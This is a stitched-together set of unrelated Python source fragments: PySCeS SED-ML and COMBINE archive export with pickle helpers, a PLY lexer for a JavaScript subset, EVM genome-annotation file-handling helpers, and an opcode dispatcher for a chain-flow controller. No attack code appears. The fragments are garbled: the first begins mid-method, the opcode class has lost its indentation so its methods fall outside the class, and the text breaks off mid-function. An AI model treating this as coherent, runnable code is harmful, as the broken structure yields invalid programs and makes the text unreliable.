                if not os.path.exists(os.path.join(self.sedpath, 'sedxtmp')):
                    os.makedirs(os.path.join(self.sedpath, 'sedxtmp'))
                mf = os.path.join(self.sedpath, 'sedxtmp', '%s-%s.xml' % (self.id, m_))
                tmp = (m_, str('%s-%s.xml' % (self.id, m_)))
            pysces.interface.writeMod2SBML(self.models[m_], mf)
            sedscr.write("AddModel('%s', r'%s', 'urn:sedml:language:sbml')\n" % tmp)
        sedscr.write('\n')
        for s_ in self.sims:
            S = self.sims[s_]
            sedscr.write("AddTimeCourseSimulation('%s', '%s', %s, %s, %s, %s)\n" % (s_,\
                S['algorithm'], S['start'], S['initial'], S['end'], S['steps']))
        sedscr.write('\n')
        for t_ in self.tasks:
            T = self.tasks[t_]
            sedscr.write("AddTask(\'%s\', \'%s\', \'%s\')\n" % (t_, T['sim'], T['model']))
        sedscr.write('\n')
        for dg_ in self.datagens:
            D = self.datagens[dg_]
            sedscr.write("AddColumn('%s', [['%s', '%s', '%s']])\n" % (dg_, D['varId'], D['taskId'], D['var']))
        sedscr.write('\n')
        for p_ in self.plots2d:
            P = self.plots2d[p_]
            sedscr.write("AddPlot('%s', '%s', [" % (p_, P['name']))
            cstr = ''
            for c_ in P['curves']:
                cstr += "['%s', '%s']," % (c_[0], c_[1])
            # Drop the trailing comma before closing the list.
            sedscr.write(cstr[:-1])
            sedscr.write("])\n")
        sedscr.write('\n')
        print '\nThe SED\n++++++\n'
        sedscr.seek(0)
        print sedscr.read()
        sedscr.seek(0)
        if not sedx:
            sf = os.path.join(self.sedpath, '%s.txt' % (self.id))
        else:
            sf = os.path.join(self.sedpath, 'sedxtmp', '%s.txt' % (self.id))
        F = file(sf, 'w')
        F.write(sedscr.read())
        F.flush()
        F.close()
        self.__sedscript__ = sf
        print '\nSED-ML script files written to:', sf
    def writeSedXML(self, sedx=False):
        # Convert the SED-ML script to SED-ML XML using (in order of
        # preference): the _SED_CURRENT_ bypass, local libSEDML console
        # tool, or the SBW SOAP webservice.
        sedname = '%s.sed.xml' % (self.id)
        self.writeSedScript(sedx=sedx)
        if not sedx:
            sf = os.path.join(self.sedpath, sedname)
        else:
            sf = os.path.join(self.sedpath, 'sedxtmp', sedname)
        if self._SED_CURRENT_:
            print '\nBypass active: SED-ML files written to: %s' % self.sedpath
        elif self.HAVE_LIBSEDML:
            assert os.path.exists(self.libSEDMLpath)
            #sedname = '%s.sed.xml' % (self.id)
            #self.writeSedScript(sedx=sedx)
            #if not sedx:
                #sf = os.path.join(self.sedpath, sedname)
            #else:
                #sf = os.path.join(self.sedpath, 'sedxtmp', sedname)
            cmd = ['%s' % str(self.libSEDMLpath), '--fromScript', '%s' % str(self.__sedscript__), '%s' % str(sf)]
            print cmd
            try:
                a = subprocess.call(cmd)
            except Exception, ex:
                print '\nOops no SED: %s' % ex
            self.__sedxml__ = sf
            F = file(sf, 'r')
            self._SED_XML_ = F.read()
            F.close()
            del F
            print 'SED-ML files written to: %s' % self.sedpath
            self.__sedarchive__ = None
        elif self.HAVE_SBWSEDSOAP:
            print('\nINFO: PySCeS will now try to connect via internet to: http://sysbioapps.dyndns.org ...\n(press <ctrl>+<c> to abort)')
            time.sleep(5)
            #sedname = '%s.sed.xml' % (self.id)
            #self.writeSedScript(sedx=sedx)
            #if not sedx:
                #sf = os.path.join(self.sedpath, sedname)
            #else:
                #sf = os.path.join(self.sedpath, 'sedxtmp', sedname)
            F = file(self.__sedscript__, 'r')
            sedscr = F.read()
            F.close()
            self._SED_XML_ = self.sbwsedclient.ConvertScriptToSedML(sedscr)
            F = file(sf, 'w')
            F.write(self._SED_XML_)
            F.flush()
            F.close()
            self.__sedxml__ = sf
            print 'SED-ML files written to: %s' % self.sedpath
            self.__sedarchive__ = None
        else:
            raise RuntimeError, '\n'
        if self._SED_CURRENT_:
            # Bypass path: dump the pre-set XML straight to disk.
            # NOTE(review): relies on self.__sedxml__ having been set by an
            # earlier call -- it is not set in the bypass branch above.
            F = file(self.__sedxml__, 'w')
            F.write(self._SED_XML_)
            F.flush()
            F.close()
    def writeSedXArchive(self):
        # Build <id>.sed.sedx: zip the SED-ML XML and SBML models from the
        # sedxtmp/ staging directory, then delete that directory.
        self.writeSedXML(sedx=True)
        sedxname = '%s.sed.sedx' % (self.id)
        #sedxname = '%s.sed.sedx.zip' % (self.id)
        ptmp = os.path.join(self.sedpath, 'sedxtmp')
        sf = os.path.join(self.sedpath, sedxname)
        self.__sedarchive__ = sf
        zf = zipfile.ZipFile(sf, mode='w', compression=zipfile.ZIP_DEFLATED)
        zf.write(self.__sedxml__, arcname=os.path.split(self.__sedxml__)[-1])
        for m_ in self.models:
            modname = '%s-%s.xml' % (self.id, m_)
            modpath = os.path.join(ptmp, modname)
            zf.write(modpath, arcname=modname)
        zf.close()
        for f_ in os.listdir(ptmp):
            os.remove(os.path.join(ptmp, f_))
        os.removedirs(ptmp)
        if not self._SED_CURRENT_:
            # Invalidate paths that pointed into the deleted staging dir.
            self.__sedxml__ = None
            self.__sedscript__ = None
        print 'SED-ML archive created: %s' % sf
    def writeCOMBINEArchive(self, vc_given='PySCeS', vc_family='Software', vc_email='', vc_org='pysces.sourceforge.net'):
        """
        Write a COMBINE archive using the following information:
        - vc_given
        - vc_family
        - vc_email
        - vc_org
        """
        # NOTE(review): '%i:00' formats the UTC offset without sign/zero
        # padding; py2 integer division of time.timezone.
        scTime = time.strftime('%Y-%m-%dT%H:%M:%S') + '%i:00' % (time.timezone/60/60)
        self.writeSedXML(sedx=True)
        sedxname = '%s.sed.omex' % (self.id)
        #sedxname = '%s.sed.omex.zip' % (self.id)
        sf = os.path.join(self.sedpath, sedxname)
        ptmp = os.path.join(self.sedpath, 'sedxtmp')
        self.__sedarchive__ = sf
        zf = zipfile.ZipFile(sf, mode='w', compression=zipfile.ZIP_STORED)
        zf.write(self.__sedxml__, arcname=os.path.split(self.__sedxml__)[-1])
        # MFstr: manifest.xml entries; MDstr: metadata.rdf vCard/timestamps.
        MFstr = ''
        MDstr = ''
        MFstr += '<omexManifest xmlns="http://identifiers.org/combine.specifications/omex-manifest">\n'
        MFstr += ' <content location="." format="http://identifiers.org/combine.specifications/omex"/>\n'
        MFstr += ' <content location="./%s" format="http://identifiers.org/combine.specifications/sedml"/>\n' % os.path.split(self.__sedxml__)[-1]
        for m_ in self.models:
            modname = '%s-%s.xml' % (self.id, m_)
            modpath = os.path.join(ptmp, modname)
            zf.write(modpath, arcname=modname)
            MFstr += ' <content location="./%s" format="http://identifiers.org/combine.specifications/sbml"/>\n' % modname
        MFstr += ' <content location="./metadata.rdf" format="http://identifiers.org/combine.specifications/omex-metadata"/>'
        MF = file(os.path.join(ptmp, 'manifest.xml'), 'w')
        MF.write('<?xml version="1.0" encoding="utf-8"?>\n%s\n</omexManifest>\n' % MFstr)
        MF.close()
        MD = file(os.path.join(ptmp, 'metadata.rdf'), 'w')
        MD.write('<?xml version="1.0" encoding="UTF-8"?>\n')
        MD.write('<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n')
        MD.write(' xmlns:dcterms="http://purl.org/dc/terms/"\n')
        MD.write(' xmlns:vCard="http://www.w3.org/2006/vcard/ns#"\n')
        MD.write(' xmlns:bqmodel="http://biomodels.net/models-qualifiers">\n')
        MD.write(' <rdf:Description rdf:about=".">\n')
        #MDstr += ' <dcterms:description>\n %s\n </dcterms:description>\n' % self.omex_description
        MDstr += ' <dcterms:creator>\n'
        MDstr += ' <rdf:Bag>\n'
        MDstr += ' <rdf:li rdf:parseType="Resource">\n'
        MDstr += ' <vCard:hasName rdf:parseType="Resource">\n'
        MDstr += ' <vCard:family-name>{}</vCard:family-name>\n'.format(vc_family)
        MDstr += ' <vCard:given-name>{}</vCard:given-name>\n'.format(vc_given)
        MDstr += ' </vCard:hasName>\n'
        MDstr += ' <vCard:hasEmail rdf:resource="{}" />\n'.format(vc_email)
        MDstr += ' <vCard:organization-name>\n'
        MDstr += ' {}\n'.format(vc_org)
        MDstr += ' </vCard:organization-name>\n'
        MDstr += ' </rdf:li>\n'
        MDstr += ' </rdf:Bag>\n'
        MDstr += ' </dcterms:creator>\n'
        MDstr += ' <dcterms:created rdf:parseType="Resource">\n'
        MDstr += ' <dcterms:W3CDTF>{}</dcterms:W3CDTF>\n'.format(scTime)
        MDstr += ' </dcterms:created>\n'
        MDstr += ' <dcterms:modified rdf:parseType="Resource">\n'
        MDstr += ' <dcterms:W3CDTF>{}</dcterms:W3CDTF>\n'.format(scTime)
        MDstr += ' </dcterms:modified>\n'
        MD.write('{}'.format(MDstr))
        MD.write(' </rdf:Description>\n')
        MD.write('</rdf:RDF> \n')
        MD.close()
        zf.write(os.path.join(ptmp, 'manifest.xml'), arcname='manifest.xml')
        zf.write(os.path.join(ptmp, 'metadata.rdf'), arcname='metadata.rdf')
        zf.close()
        for f_ in os.listdir(ptmp):
            os.remove(os.path.join(ptmp, f_))
        os.removedirs(ptmp)
        if not self._SED_CURRENT_:
            self.__sedxml__ = None
            self.__sedscript__ = None
        print 'COMBINE archive created: %s' % sf
def storeObj(obj, filename):
    """
    Stores a Python *obj* as a serialised binary object in *filename*.dat
    """
    filename = filename+'.dat'
    F = file(filename, 'wb')
    cPickle.dump(obj, F, protocol=2)
    print 'Object serialised as %s' % filename
    F.close()

def loadObj(filename):
    """
    Loads a serialised Python cPickle from *filename* returns the Python object(s)
    """
    # SECURITY: cPickle.load executes arbitrary code from the file; only
    # load .dat files this module itself produced.
    assert os.path.exists(filename), '\nTry again mate!'
    F = file(filename, 'rb')
    obj = cPickle.load(F)
    F.close()
    return obj
| |
import ply.lex as lex
# Token names for this JavaScript subset; PLY requires `tokens` to list
# every type the t_* rules below can return.
tokens = (
    'ANDAND',      # &&
    'COMMA',       # ,
    'DIVIDE',      # /
    'ELSE',        # else
    'EQUAL',       # =
    'EQUALEQUAL',  # ==
    'FALSE',       # false
    'FUNCTION',    # function
    'GE',          # >=
    'GT',          # >
    'IDENTIFIER',  # identifier names
    'IF',          # if
    'LBRACE',      # {
    'LE',          # <=
    'LPAREN',      # (
    'LT',          # <
    'MINUS',       # -
    'NOT',         # !
    'NUMBER',      # [0-9]+
    'OROR',        # ||
    'PLUS',        # +
    'RBRACE',      # }
    'RETURN',      # return
    'RPAREN',      # )
    'SEMICOLON',   # ;
    'STRING',      # "hello"
    'TIMES',       # *
    'TRUE',        # true
    'VAR',         # var
)

# Exclusive lexer state entered inside /* ... */ comments: none of the
# INITIAL-state rules apply there.
states = (
    ('javascriptcomment', 'exclusive'),
)
def t_javascriptcomment(token):
    r'\/\*'
    # '/*' switches into the exclusive comment state; nothing is emitted.
    token.lexer.begin('javascriptcomment')

def t_javascriptcomment_end(token):
    r'\*\/'
    # NOTE(review): token.value is just '*/' here (skipped comment text is
    # not accumulated), so newlines inside the comment are not counted and
    # lineno will lag after multi-line comments -- confirm intent.
    token.lexer.lineno += token.value.count('\n')
    token.lexer.begin('INITIAL')

def t_javascriptcomment_error(token):
    # Inside a comment every unmatched character is silently skipped.
    token.lexer.skip(1)

def t_eolcomment(token):
    r'//.*'
    # Line comments produce no token.
    pass

t_ignore = ' \t\v\r'
t_javascriptcomment_ignore = ' \t\v\r'

def t_newline(token):
    r'\n'
    token.lexer.lineno += 1

def t_error(token):
    # Python 2 print statement; reports the offending character and skips it.
    print "JavaScript Lexer: Illegal Character " + token.value[0]
    return token.lexer.skip(1)
# PLY tries function rules in definition order, so two-character operators
# (&&, ==, <=, >=) are defined before their one-character prefixes, and the
# keyword rules precede t_IDENTIFIER.
# NOTE(review): keyword rules have no word boundary, so 'iffy' lexes as
# IF + IDENTIFIER('fy'); t_IDENTIFIER also disallows digits; and since
# t_MINUS precedes t_NUMBER, the leading '-?' in t_NUMBER is effectively
# unreachable -- confirm these are intended for this exercise grammar.
def t_NOT(token):
    r'!'
    return token

def t_ANDAND(token):
    r'&&'
    return token

def t_OROR(token):
    r'\|\|'
    return token

def t_DIVIDE(token):
    r'/'
    return token

def t_TIMES(token):
    r'\*'
    return token

def t_PLUS(token):
    r'\+'
    return token

def t_MINUS(token):
    r'-'
    return token

def t_EQUALEQUAL(token):
    r'=='
    return token

def t_EQUAL(token):
    r'='
    return token

def t_COMMA(token):
    r','
    return token

def t_SEMICOLON(token):
    r';'
    return token

def t_LBRACE(token):
    r'{'
    return token

def t_RBRACE(token):
    r'}'
    return token

def t_LPAREN(token):
    r'\('
    return token

def t_RPAREN(token):
    r'\)'
    return token

def t_LE(token):
    r'<='
    return token

def t_LT(token):
    r'<'
    return token

def t_GE(token):
    r'>='
    return token

def t_GT(token):
    r'>'
    return token

def t_FALSE(token):
    r'false'
    return token

def t_TRUE(token):
    r'true'
    return token

def t_IF(token):
    r'if'
    return token

def t_ELSE(token):
    r'else'
    return token

def t_VAR(token):
    r'var'
    return token

def t_FUNCTION(token):
    r'function'
    return token

def t_RETURN(token):
    r'return'
    return token

def t_IDENTIFIER(token):
    r'[a-zA-Z][_a-zA-Z]*'
    return token

def t_NUMBER(token):
    r'-?[0-9]+\.?[0-9]*'
    # Numbers are converted to float immediately.
    token.value = float(token.value)
    return token

def t_STRING(token):
    r'"(?:[^\\]|(?:\\.))*"'
    # Strip the surrounding quotes (escapes are left unprocessed).
    token.value = token.value[1:-1]
    return token
# Build the lexer from the rules above (Python 2 driver script below).
lexer = lex.lex()

def test_lexer(input_string):
    # Tokenize input_string, printing each token; returns None.
    lexer.input(input_string)
    while True:
        tok = lexer.token() # get the next token
        if not tok:
            break
        else:
            print tok

# Smoke test 1: every operator and keyword.
input1 = """ - ! && () * , / ; { || } + < <= = == > >= else false function if return true var"""
print test_lexer(input1)
# Smoke test 2: comment handling (// and /* */ spanning lines).
input2 = """
if //else
=/*=*/=
true /* false
*/ return"""
print test_lexer(input2)
| |
#!/usr/bin/env python3
import os
import subprocess
import sys
from glob import glob
def convert_augustus(aug_file, wd):
    """
    Converts augustus.gff to augustus.gff3 (from BRAKER1) using the EVM
    script EVMUtils/misc/augustus_GTF_to_EVM_GFF3.pl which needs to be in PATH
    :param aug_file: path to the augustus GTF/GFF file
    :param wd: working-directory prefix used to build the log file name
    :return: path of the converted GFF3 file (aug_file + '3')
    :raises NameError: when the converter cannot be run or fails
    """
    sys.stdout.write('###CONVERTING AUGUSTUS TO GFF3###\n')
    args = ['augustus_GTF_to_EVM_GFF3.pl', aug_file]
    out_file = aug_file + '3'
    if os.path.isfile(out_file):
        sys.stdout.write((
            'Augustus GFF3 file existed already: ' +
            out_file +
            ' --- skipping\n'))
        return out_file
    log_name = wd + '.augustus_GTF_to_EVM_GFF3.pl.log'
    # 'with' guarantees both handles are closed even when the call fails;
    # the original leaked them on the error path.
    with open(log_name, 'w') as log, open(out_file, 'w') as out_f:
        try:
            subprocess.check_call(args, stdout=out_f, stderr=log)
        except (subprocess.CalledProcessError, OSError) as e:
            # Narrowed from a bare except; NameError kept for backward
            # compatibility with existing callers, with the cause chained.
            raise NameError('') from e
    return out_file
def convert_genemark(genemark_file, wd):
    """
    Converts genemark.gtf to genemark.gff3 (from BRAKER1) using gtf2gff3.pl,
    which needs to be in PATH
    :param genemark_file: path to the genemark GTF file
    :param wd: working-directory prefix used to build the log file name
    :return: path of the converted GFF3 file (genemark_file + '.gff3')
    :raises NameError: when the converter cannot be run or fails
    """
    sys.stdout.write('###CONVERTING GENEMARK TO GFF3###\n')
    args = ['gtf2gff3.pl', genemark_file]
    out_file = genemark_file + '.gff3'
    if os.path.isfile(out_file):
        sys.stdout.write((
            'GeneMark GFF3 file existed already: ' +
            out_file +
            ' --- skipping\n'))
        return out_file
    log_name = wd + '.genemark_GTF_to_EVM_GFF3.pl.log'
    # 'with' closes both handles on success and failure (the original
    # leaked them when check_call raised).
    with open(log_name, 'w') as log, open(out_file, 'w') as out_f:
        try:
            subprocess.check_call(args, stdout=out_f, stderr=log)
        except (subprocess.CalledProcessError, OSError) as e:
            # Narrowed from a bare except; NameError kept for callers.
            raise NameError('') from e
    return out_file
def move_single_file(filename, key, evm_dir, new_file_d):
    """
    Moves a single file into the directory and appends the new path to the dictionary
    :param filename: source file path
    :param key: dictionary key for the file's new location
    :param evm_dir: destination directory (callers pass a trailing '/')
    :param new_file_d: dict updated in place with new_file_d[key]
    :return: new_file_d
    :raises NameError: when the copy fails
    """
    args = ['cp', filename, evm_dir]
    true_filename = os.path.basename(filename)
    # NOTE: evm_dir is concatenated, not os.path.join'ed; callers supply
    # the trailing separator.
    out_file = evm_dir + true_filename
    if os.path.isfile(out_file):
        sys.stdout.write(('File in EVM_dir already: ' + out_file + ' --- skipping\n'))
        new_file_d[key] = out_file
        return new_file_d
    try:
        subprocess.check_call(args)
    except (subprocess.CalledProcessError, OSError) as e:
        # Narrowed from a bare except, with the cause chained; NameError
        # kept for backward compatibility with existing callers.
        raise NameError('') from e
    new_file_d[key] = out_file
    return new_file_d
def braker_folder_find(location):
    """Locate BRAKER's augustus.hints.gtf and genemark.gtf under `location`."""
    def _first(pattern):
        # First match in os.walk order; IndexError if absent (as before).
        matches = [p for root, _dirs, _files in os.walk(location)
                   for p in glob(os.path.join(root, pattern))]
        return matches[0]
    return _first("augustus.hints.gtf"), _first("genemark.gtf")
def move_cat_files(file_list, key, evm_dir, new_file_d):
    """
    Moves and concatenate files to evm dir (case of GFF3 when using long
    and short reads)
    :param file_list: list of source file paths to concatenate
    :param key: dictionary key (also the output file's base name)
    :param evm_dir: destination directory (callers pass a trailing '/')
    :param new_file_d: dict updated in place with new_file_d[key]
    :return: new_file_d
    :raises NameError: when concatenation fails
    """
    args = ['cat'] + file_list
    out_file = evm_dir + key + '.gff3'
    if os.path.isfile(out_file):
        sys.stdout.write(('File in EVM_dir already: ' + out_file + ' --- skipping\n'))
        new_file_d[key] = out_file
        return new_file_d
    # 'with' closes the output even when check_call raises (the original
    # leaked the handle on the error path).
    with open(out_file, 'w') as file_:
        try:
            subprocess.check_call(args, stdout=file_)
        except (subprocess.CalledProcessError, OSError) as e:
            sys.stdout.write('Could not move ' + out_file)
            raise NameError('') from e
    new_file_d[key] = out_file
    return new_file_d
def move_EVM_inputs(evm_dir, inputs):
    """
    Takes a dictionary with files that are inputs for EVM and groups them in
    the same directory
    """
    sys.stdout.write('###MOVING IMPORTANT FILES###\n')
    new_files = {}
    for key, filename in list(inputs.items()):
        # GFF3 alignments arrive as a list when both short and long reads
        # were used; every other entry is a single path.
        handler = move_cat_files if isinstance(filename, list) else move_single_file
        new_files = handler(filename, key, evm_dir, new_files)
    return new_files
def cat_EVM_inputs(evm_dir):  # , inputs):
    """
    Takes the files in EVM input directory and concatenates the needed
    files to prepare the EVM command. Augustus, Genemark and Transdecoder
    go into gene_predictions.gff3 and pasa asemblies and transcript
    alignments go into transcripts.gff3
    """
    # GENE PREDICTIONS
    sys.stdout.write('###CONCATENATING FILES###\n')
    # GENE PREDICTION
    file_list = []  # NOTE(review): never used
    ab_initio_list = ['cat']
    protein_list = []  # NOTE(review): filled below but never read
    transcript_list = []  # NOTE(review): filled below but never read
    list_soft = []
    transcript_file = ''
    protein_file = ''
    # Classify each file in the EVM dir by naming convention and record
    # which evidence sources are present (list_soft).
    for root, dirs, files in os.walk(evm_dir):
        for name in files:
            if 'augustus' in name:
                ab_initio_list.append(os.path.join(root, name))
                list_soft.append('augustus')
            elif 'genemark' in name:
                ab_initio_list.append(os.path.join(root, name))
                list_soft.append('genemark')
            elif 'PASA' in name or 'pasa' in name:
                transcript_file = os.path.join(root, name)
                transcript_list.append(os.path.join(root, name))
                list_soft.append('pasa')
            elif 'protein' in name:
                protein_file = os.path.join(root, name)
                protein_list.append(os.path.join(root, name))
                list_soft.append('exonerate')
            elif 'trinity' in name:
                ab_initio_list.append(os.path.join(root, name))
                list_soft.append('gmap')
            elif 'external' in name:
                ab_initio_list.append(os.path.join(root, name))
                list_soft.append('external')
    pred_filename = evm_dir + 'gene_predictions.gff3'
    if os.path.isfile(pred_filename):
        sys.stdout.write(('Gene predictions GFF3 file existed already: ' + pred_filename + ' --- skipping\n'))
    else:
        # Concatenate all ab-initio/alignment predictions via `cat`.
        pred_file = open(pred_filename, 'w')
        try:
            subprocess.check_call(ab_initio_list, stdout=pred_file, cwd=evm_dir)
            # sys.stdout.write '> Gene prediction concatenation completed'
        except:
            # sys.stdout.write 'Gene prediction concatenation failed'
            raise NameError('')
        pred_file.close()
    return list_soft, pred_filename, transcript_file, protein_file
def group_EVM_inputs(evm_dir, inputs):
    """
    Moves all the inputs to EVM directory and concatenates them
    in the same file"""
    # Stage the files, then return cat_EVM_inputs' 4-tuple directly:
    # (list_soft, pred_file, transcript_file, protein_file).
    move_EVM_inputs(evm_dir, inputs)
    return cat_EVM_inputs(evm_dir)
def evm_weight(evm_dir, weights_dic, evidences, pasa_name, gmap_name):
    """
    Writes a weight file "weights.txt" on evm_dir and returns its path.
    """
    w_filename = evm_dir + 'weights.txt'
    evidence_dic = {'GeneMark.hmm': 'ABINITIO_PREDICTION', 'Augustus': 'ABINITIO_PREDICTION', 'exonerate': 'PROTEIN', pasa_name: 'TRANSCRIPT',
                    gmap_name: 'ABINITIO_PREDICTION', 'external': 'ABINITIO_PREDICTION'}
    software_links = {'genemark': 'GeneMark.hmm', 'augustus': 'Augustus', 'exonerate': 'exonerate', 'external': 'external', 'pasa': pasa_name,
                      'gmap': gmap_name}
    # Preserve software_links insertion order (dicts keep it) when mapping
    # present evidences to their weight-file labels.
    list_match = [label for software, label in software_links.items() if software in evidences]
    with open(w_filename, 'w') as w_file:
        for present_soft in list_match:
            if present_soft in evidence_dic:
                w_file.write('\t'.join([evidence_dic[present_soft], present_soft, weights_dic[present_soft]]))
                w_file.write('\n')
    return w_filename
if __name__ == '__main__':
    #strand(*sys.argv[1:])
    #exonerate(fasta, outputFilename, proc, gmap_wd, verbose) genename_evm(gff_filename, verbose, wd)
    # CLI: forwards argv to cat_EVM_inputs (expects a single evm_dir arg).
    cat_EVM_inputs(*sys.argv[1:])
| |
import datetime
import time
class Opcodes():
def __init__(self):
    """Build the dispatch table mapping opcode names to handler methods."""
    # Dict literal preserves the original registration order.
    self.opcodes = {
        "Terminate": self.terminate_code,
        "Reset": self.reset_code,
        "Halt": self.halt_code,
        "Enable_Chain": self.enable_chain_code,
        "Disable_Chain": self.disable_chain_code,
        "Suspend_Chain": self.suspend_chain_code,
        "Resume_Chain": self.resume_chain_code,
        "Log": self.log_code,
        "One_Step": self.one_step_code,
        "Send_Event": self.send_event_code,
        "Check_Event": self.check_event_code,
        "Code": self.code_code,
        "Wait_Tod": self.wait_tod_code,
        "Wait_Tod_GE": self.wait_tod_ge_code,
        "Wait_Tod_LE": self.wait_tod_le_code,
        "Wait_Event_Count": self.wait_event_count_code,
        "Wait_Fn": self.wait_fn_code,
        "Verify_Tod": self.verify_tod_code,
        "Verify_Tod_GE": self.verify_tod_ge_code,
        "Verify_Tod_LE": self.verify_tod_le_code,
        "Verify_Not_Event_Count": self.verify_not_event_count_code,
        "Verify_Fn": self.verify_fn_code,
        "Assert_Tod": self.assert_tod_code,
        "Assert_Tod_GE": self.assert_tod_ge_code,
        "Assert_Tod_LE": self.assert_tod_le_code,
        "Assert_Not_Event_Count": self.assert_not_event_count_code,
        "Assert_Fn": self.assert_fn_code,
    }
def get_opcode(self, opcode_name):
    """Look up a handler by opcode name (KeyError when unknown)."""
    return self.opcodes[opcode_name]

def add_opcode(self, name, code):
    """Register (or replace) a handler under `name`."""
    self.opcodes[name] = code
def terminate_code(self, cf_handle, chainObj, parameters, event):
return "TERMINATE"
def reset_code(self, cf_handle, chainObj, parameters, event):
return "RESET"
def halt_code(self, cf_handle, chainObj, parameters, event):
return "HALT"
def enable_chain_code(self, cf_handle, chainObj, parameters, event):
    # Enable every chain named in parameters[0] via the chain-flow handle.
    chains = parameters[0]
    for j in chains:
        cf_handle.enable_chain_base(j)
    return "DISABLE"

def disable_chain_code(self, cf_handle, chainObj, parameters, event):
    # Disable every chain named in parameters[0].
    chains = parameters[0]
    for j in chains:
        cf_handle.disable_chain_base(j)
    return "DISABLE"

def resume_chain_code(self, cf_handle, chainObj, parameters, event):
    # NOTE(review): calls cf_handle.resume_chain_code, while enable/disable
    # above call *_chain_base -- possibly should be resume_chain_base;
    # confirm against the chain-flow handle's API.
    chains = parameters[0]
    for j in chains:
        cf_handle.resume_chain_code(j)
    return "DISABLE"

def suspend_chain_code(self, cf_handle, chainObj, parameters, event):
    # NOTE(review): same asymmetry as resume_chain_code (calls
    # suspend_chain_code rather than a *_chain_base method) -- confirm.
    chains = parameters[0]
    for j in chains:
        cf_handle.suspend_chain_code(j)
    return "DISABLE"
def log_code(self, cf_handle, chainObj, parameters, event):
if event["name"] == "INIT":
print("Log ---",time.time(), parameters[0])
return "DISABLE"
def one_step_code(self, cf_handle, chainObj, parameters, event):
if event["name"] != "INIT":
func = parameters[0]
func(cf_handle, chainObj, parameters, event)
return "DISABLE"
def send_event_code(self, cf_handle, chainObj, parameters, event):
# print "send event ",parameters[0]
event_name = parameters[0]
if len(parameters) > 1:
event_data = parameters[1]
else:
event_data = None
event = {}
event["name"] = event_name
event["data"] = event_data
cf_handle.event_queue.append(event)
return "DISABLE"
def check_event_code(self, cf_handle, chainObj, parameters, event):
if event["name"] == "INIT":
func = parameters[1]
func(cf_handle, chainObj, parameters, event)
elif event["name"] == parameters[0]:
func = parameters[1]
func(cf_handle, chainObj, parameters, event)
return "CONTINUE"
def code_code(self, cf_handle, chainObj, parameters, event):
return_value = parameters[0](cf_handle, chainObj, parameters, event)
# print "return_value%%%%%%%%%%%%%%%%%%%%%%", return_value
return return_value
def wait_event_count_code(self, cf_handle, chainObj, parameters, event):
returnValue = "HALT"
if event["name"] == "INIT":
parameters.append(0)
else:
if event["name"] == parameters[0]:
parameters[-1] = parameters[-1] + 1
if parameters[-1] >= int(parameters[1]):
returnValue = "DISABLE"
return returnValue
def wait_tod_code(self, cf_handle, chainObj, parameters, event):
returnValue = "HALT"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == time_stamp.weekday()) or
(dow == "*")) == False:
return returnValue
if ((hour == time_stamp.hour) or
(hour == "*")) == False:
return returnValue
if ((minute == time_stamp.minute) or
(minute == "*")) == False:
return returnValue
if ((second == time_stamp.second) or
(second == "*")) == False:
return returnValue
return "DISABLE"
def wait_tod_le_code(self, cf_handle, chainObj, parameters, event):
returnValue = "HALT"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow >= time_stamp.weekday())) == False:
return returnValue
if ((hour == "*") or
(hour >= time_stamp.hour)) == False:
return returnValue
if ((minute == "*") or
(minute >= time_stamp.minute)) == False:
return returnValue
if ((second == "*") or
(second >= time_stamp.second)) == False:
return returnValue
return "DISABLE"
def wait_tod_ge_code(self, cf_handle, chainObj, parameters, event):
returnValue = "HALT"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow <= time_stamp.weekday())) == False:
return returnValue
if ((hour == "*") or
(hour <= time_stamp.hour)) == False:
return returnValue
if ((minute == "*") or
(minute <= time_stamp.minute)) == False:
return returnValue
if ((second == "*") or
(second <= time_stamp.second)) == False:
return returnValue
return "DISABLE"
def wait_fn_code(self, cf_handle, chainObj, parameters, event):
waitFn = parameters[0]
if waitFn(cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
else:
returnValue = "HALT"
return returnValue
def verify_return_code( self, cf_handle, reset_event, reset_flag ):
if reset_event[0] != None:
event = {}
event["name"] = reset_event[0]
event["data"] = reset_event[1]
cf_handle.event_queue.append(event)
if reset_flag == True:
return_value = "RESET"
else:
return_value = "TERMINATE"
return return_value
def verify_fn_code(self, cf_handle, chainObj, parameters, event):
reset_event = parameters[1]
reset_flag = parameters[2]
verifyFn = parameters[0]
if verifyFn (cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
else:
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def verify_not_event_count_code(self, cf_handle, chainObj, parameters, event):
reset_flag = parameters[3]
reset_event = parameters[2]
returnValue = "CONTINUE"
if event["name"] == "INIT":
parameters.append(0)
else:
if event["name"] == parameters[0]:
parameters[-1] = parameters[-1] + 1
if parameters[-1] >= int(parameters[1]):
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def verify_tod_code(self, cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == time_stamp.weekday()) or
(dow == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == time_stamp.hour) or
(hour == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == time_stamp.minute) or
(minute == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((second == time_stamp.second) or
(second == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def verify_tod_le_code(self, cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
